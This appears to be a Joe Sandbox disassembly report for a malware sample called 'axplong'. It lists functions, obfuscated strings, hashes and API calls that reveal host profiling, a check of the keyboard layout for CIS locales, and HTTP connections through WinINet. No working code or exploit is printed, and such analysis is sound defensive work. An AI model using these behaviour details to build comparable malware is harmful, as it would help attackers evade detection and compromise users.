Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4)$fed3aa
API String ID: 0-4075161069
Opcode ID: 4cebbf563c6a086334661858391b26adabaabe1d038aaaa13bfad81def51024d
Instruction ID: a5933bd1da8ba7a84c60c81ae4716a34e2ea3abbf65047c053501341f5212421
Opcode Fuzzy Hash: 4cebbf563c6a086334661858391b26adabaabe1d038aaaa13bfad81def51024d
Instruction Fuzzy Hash: 87721570D24248DBEF18EF68C9497DDBBB6AB06304F508598E815273C2C7759A98CFD2

Function 002365B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00236650

Strings

RBPleCSm, xrefs: 0023666C
GVQsgL==, xrefs: 002366F8
IVKsgL==, xrefs: 002367A1

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 1484870144-3856690409
Opcode ID: 24d62f47f0f28fcea261e5bfd094be689135c94fc2fb564273d430a774e09cdc
Instruction ID: 0a58164d6ea5f513d8f8359a443e0a009a487510913d6c7ef97359c7cb7731a7
Opcode Fuzzy Hash: 24d62f47f0f28fcea261e5bfd094be689135c94fc2fb564273d430a774e09cdc
Instruction Fuzzy Hash: F091B2F1910118ABDB28DB24CC89BDDB779EB49304F4085E9E50997282DB349FD88FA4

Function 0024D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0023247E

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: a0e0bfa6ea6d78f8a924f2a176ece01c9f6ef0058ba359f2cb10c9aa3e2481ec
Instruction ID: 6f6e34280d11c3a7c6a923a6b69aa8c205b69601445a93c13dfc3e72353555a5
Opcode Fuzzy Hash: a0e0bfa6ea6d78f8a924f2a176ece01c9f6ef0058ba359f2cb10c9aa3e2481ec
Instruction Fuzzy Hash: 8A518CB2E20616DFDB19CF58E8857AEBBF4FB18310F24856AE405EB250D7749960CF90

Function 00243550 Relevance: 53.3, APIs: 1, Strings: 29, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0024425F

Part of subcall function 00247870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0024795C
Part of subcall function 00247870: __Cnd_destroy_in_situ.LIBCPMT ref: 00247968
Part of subcall function 00247870: __Mtx_destroy_in_situ.LIBCPMT ref: 00247971

Strings

HBhr, xrefs: 0024378F
aqB6, xrefs: 002454DB
invalid stoi argument, xrefs: 00242DE9, 00242DF8, 0024425A, 00244E9D
9526, xrefs: 0024531D
WJms, xrefs: 00243BD9
", xrefs: 00243E99
V5Qk, xrefs: 00243DC0
JB6, xrefs: 002453F5
W07l, xrefs: 00243AEE
aZT6, xrefs: 002453CC
WJP6, xrefs: 002453A3
9KN6, xrefs: 00245351
5120, xrefs: 00243ABF, 00243BAA
Vp 6, xrefs: 00245447
6F9fr==, xrefs: 00244712
Fz==, xrefs: 0024369E, 00244D2D
5F6, xrefs: 00245497
mP=, xrefs: 00246383
8ZF6, xrefs: 00245502
MJF+, xrefs: 002447BD, 002448EC, 00244ADC, 00244C0B
stoi argument out of range, xrefs: 00242E02, 00244269, 00244EAC
fed3aa, xrefs: 00245489
V0N6, xrefs: 0024537A
246122658369, xrefs: 00241EA5, 002427EE, 00242A43, 00242AB0, 00242E88, 00243373, 002433D4, 00244F4D, 00244F8F, 00244F99, 002454F4
V0x6, xrefs: 0024541E
KFT0PL==, xrefs: 002454B9
-), xrefs: 00244F3A
MJB+, xrefs: 00244776, 002447ED, 00244A95, 00244B0C
96B6, xrefs: 00245470

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range$-)
API String ID: 4234742559-3966962328
Opcode ID: 07da9a60fa185765b841aa16eb88fddcae5b68732970e9d58fe7ed49475343db
Instruction ID: bf2bd9d392915434fc80789d224485e0712678b3ec1eaaeeb5e9d6db0e03eba6
Opcode Fuzzy Hash: 07da9a60fa185765b841aa16eb88fddcae5b68732970e9d58fe7ed49475343db
Instruction Fuzzy Hash: F9522571A20248DBDF1CEF78CC4A79DBB75AF45304F504598E405A7282DB749BA4CFA2

Function 002446C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00247870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0024795C
Part of subcall function 00247870: __Cnd_destroy_in_situ.LIBCPMT ref: 00247968
Part of subcall function 00247870: __Mtx_destroy_in_situ.LIBCPMT ref: 00247971

Part of subcall function 0023BD60: InternetOpenW.WININET(00288D70,00000000,00000000,00000000,00000000), ref: 0023BDED
Part of subcall function 0023BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0023BE11
Part of subcall function 0023BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0023BE5B

std::_Xinvalid_argument.LIBCPMT ref: 00244EA2

Strings

aqB6, xrefs: 002454DB
6F9fr==, xrefs: 00244712
Fz==, xrefs: 0024369E, 00244D2D
5F6, xrefs: 00245497
mP=, xrefs: 00246383, 00246652
8ZF6, xrefs: 00245502
MJF+, xrefs: 002447BD, 002448EC, 00244ADC, 00244C0B
9526, xrefs: 0024531D
stoi argument out of range, xrefs: 00244269, 00244EAC
JB6, xrefs: 002453F5
fed3aa, xrefs: 00245489
V0N6, xrefs: 0024537A
246122658369, xrefs: 00244F4D, 00244F8F, 00244F99, 002454F4
V0x6, xrefs: 0024541E
aZT6, xrefs: 002453CC
KFT0PL==, xrefs: 002454B9
-), xrefs: 00244F3A
WJP6, xrefs: 002453A3
MJB+, xrefs: 00244776, 002447ED, 00244A95, 00244B0C
9KN6, xrefs: 00245351
96B6, xrefs: 00245470
Vp 6, xrefs: 00245447

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-)
API String ID: 2414744145-1048831896
Opcode ID: 16db31b2ac438393ce2b0c19f9ad194405acf582d807e8ddc85362092c56d8eb
Instruction ID: 23d1c237e5832318b8aa87ea6aa9419d4a6204ea0573e33ff44a5f080c4d89eb
Opcode Fuzzy Hash: 16db31b2ac438393ce2b0c19f9ad194405acf582d807e8ddc85362092c56d8eb
Instruction Fuzzy Hash: DF233571E201589BEF1DDB28CD8979DBB769B82304F5081D8E048AB2D2DB355FA4CF52

Function 00242E20 Relevance: 36.3, APIs: 5, Strings: 15, Instructions: 1325COMMON

Download Yara Rule

APIs

Part of subcall function 00247870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0024795C
Part of subcall function 00247870: __Cnd_destroy_in_situ.LIBCPMT ref: 00247968
Part of subcall function 00247870: __Mtx_destroy_in_situ.LIBCPMT ref: 00247971

std::_Xinvalid_argument.LIBCPMT ref: 0024425F

Strings

HBhr, xrefs: 0024378F
WWt=, xrefs: 00241E88, 00242A26, 00242E6E
WGt=, xrefs: 002427D1, 002433BA
invalid stoi argument, xrefs: 00242DE9, 00242DF8, 0024425A
Fz==, xrefs: 0024369E
WJms, xrefs: 00243BD9
stoi argument out of range, xrefs: 00242E02, 00244269
", xrefs: 00243E99
V5Qk, xrefs: 00243DC0
8KG0fCKZFzY=, xrefs: 00242F64
8KG0fymoFx==, xrefs: 00242EC7, 00243136
W07l, xrefs: 00243AEE
246122658369, xrefs: 00241EA5, 002427EE, 00242A43, 00242AB0, 00242E88, 00243373, 002433D4
WWp=, xrefs: 00242A93, 00243359
5120, xrefs: 00243ABF, 00243BAA

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$246122658369$5120$8KG0fCKZFzY=$8KG0fymoFx==$Fz==$HBhr$V5Qk$W07l$WGt=$WJms$WWp=$WWt=$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-2030321068
Opcode ID: 8554be9a62526d9f3fc723cf4e76e1a452f5c1101b121c6ce0783d1e79058dc1
Instruction ID: bda59637ea87d74ad2bdce526f58a6866cb6b9c5e625ad82e08acb4c8fc3ea37
Opcode Fuzzy Hash: 8554be9a62526d9f3fc723cf4e76e1a452f5c1101b121c6ce0783d1e79058dc1
Instruction Fuzzy Hash: 77B21471A20248DBEF1CEF68CC4A79DBBB5AF45304F50419CE405A7282DB759BA4CF92

Function 00235DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 0023600A
00000419, xrefs: 00235FA8
00000422, xrefs: 00235FD9
Keyboard Layout\Preload, xrefs: 00235F64
0000043f, xrefs: 0023603B

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 6cae8e972f46127b6e1a318e76a970b3035e3cbc0fa8877ab0eb654886b83056
Instruction ID: 4df2f5399a0f95fa553f0319604881e03aa84bd2306ccf669f2513a474621528
Opcode Fuzzy Hash: 6cae8e972f46127b6e1a318e76a970b3035e3cbc0fa8877ab0eb654886b83056
Instruction Fuzzy Hash: 3FE1AE71910218BBEB28DFA4CC8CBDEB779AF05304F5042D9E509A7291DB749BD88F91

Function 00237D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00237EA3

Strings

JmpyPb==, xrefs: 0023810A
JmpxRL==, xrefs: 00238062
JmpxQb==, xrefs: 002381B2

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: b861b46dcd595bdb8cb0b748c8c47c92b389a6234d954c2b22dadfb0cb0e1d02
Instruction ID: a1591be8127193c75b94c9ddd4ec523d13074a57dd3ef5655d6e4e7ffe4dffaf
Opcode Fuzzy Hash: b861b46dcd595bdb8cb0b748c8c47c92b389a6234d954c2b22dadfb0cb0e1d02
Instruction Fuzzy Hash: 63D11AB0E20654EBDF24FB68DC4B39D7771AB42314F504289E8156B3C2DB354EA48BD2

Function 00266E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00266E23
GetFileInformationByHandle.KERNEL32(?,?), ref: 00266E7D
__dosmaperr.LIBCMT ref: 00266F12

Part of subcall function 00267177: __dosmaperr.LIBCMT ref: 002671AC

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: a69d95846a1f6877c13dedd365039dd1904255d10eae4004c84ee70543261dde
Instruction ID: 6eba2dfb55ecfc252a21fe142bf7611feeb218f8b924cf8287dc12d60568dd77
Opcode Fuzzy Hash: a69d95846a1f6877c13dedd365039dd1904255d10eae4004c84ee70543261dde
Instruction Fuzzy Hash: 3A418F75910245ABCB24EFB5EC599AFBBF9EF88300B10442DF856D3611EB31A894CF60

Function 0026D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81047911f28de1e7b98aefbce588f0107553e9d31f5f1bde31b1264b540557ad
Instruction ID: b8f4b7be7ecc9b72f1ee7436bb024cf9caffbf640a5f801ad0a8d8806058d68f
Opcode Fuzzy Hash: 81047911f28de1e7b98aefbce588f0107553e9d31f5f1bde31b1264b540557ad
Instruction Fuzzy Hash: FE610572F3021E8FDF25EF68E8857EDB7B4EB55318F24411AD44AA7250D6309CA08F61

Function 002382B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00238454

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 45d554f139767b6a57388434240c47e94739cb1e7a23f23b610918ed1cfacd14
Instruction ID: 1da43a8b609d06f311e1df597639be747947426055e083a573d776f5a9c68131
Opcode Fuzzy Hash: 45d554f139767b6a57388434240c47e94739cb1e7a23f23b610918ed1cfacd14
Instruction Fuzzy Hash: 545128B09203199BDB14EF68CD497DDB7759B46300F504299F918AB381EF349AA48F91

Function 00266C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
